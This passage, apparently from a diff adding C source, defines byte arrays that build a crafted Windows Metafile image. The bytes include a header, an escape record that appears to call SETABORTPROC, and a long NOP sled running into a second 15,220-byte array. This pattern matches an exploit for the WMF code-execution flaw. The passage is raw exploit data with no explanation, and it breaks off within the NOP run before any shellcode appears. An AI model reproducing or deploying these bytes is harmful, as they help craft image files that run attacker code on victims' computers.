0x01, 0x00, 0x09, 0x00, 0x00, 0x03, 0x52, 0x1F, 0x00, 0x00, 0x06, 0x00, 0x3D, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x18, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, + 0xFF, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x85, 0x00, + 0xD0, 0x02, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, + 0xFF, 0xFF, 0x02, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x23, 0x00, + 0xFF, 0xFF, 0xFF, 0xFF, 0x04, 0x00, 0x1B, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x14, 0x00, 0x20, 0x00, + 0xB8, 0x00, 0x32, 0x06, 0x00, 0x00, 0xFF, 0xFF, 0x4F, 0x00, 0x14, 0x00, 0x00, 0x00, 0x4D, 0x00, + 0x69, 0x00, 0x00, 0x00, 0x0A, 0x00, 
0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x0A, 0x00, 0x54, 0x4E, + 0x50, 0x50, 0x00, 0x00, 0x02, 0x00, 0xF4, 0x03, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, + 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x03, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x26, 0x06, + 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0B, 0x02, 0x00, 0x00, + 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0C, 0x02, 0xD0, 0x02, 0xC0, 0x03, 0x04, 0x00, 0x00, 0x00, + 0x04, 0x01, 0x0D, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00, + 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, + 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x1D, 0x06, 0x21, 0x00, 0xF0, 0x00, 0xD0, 0x02, 0xC0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0xFF, 0xFF, + 0xFF, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, + 0xF0, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x10, 0x00, + 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x16, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x47, 0x00, + 0x00, 0x00, 0x8F, 0x02, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0xC1, 0x02, 0x00, 0x00, 0x08, 0x00, + 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x06, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x0D, 0x00, + 0x00, 0x00, 0xFB, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x01, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0x00, 0x00, 0x00, 0x02, 0x05, 0x00, 
0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00, + 0x26, 0x06, 0x09, 0x00, 0x16, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 +}; + +unsigned char head2[15220] = { + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 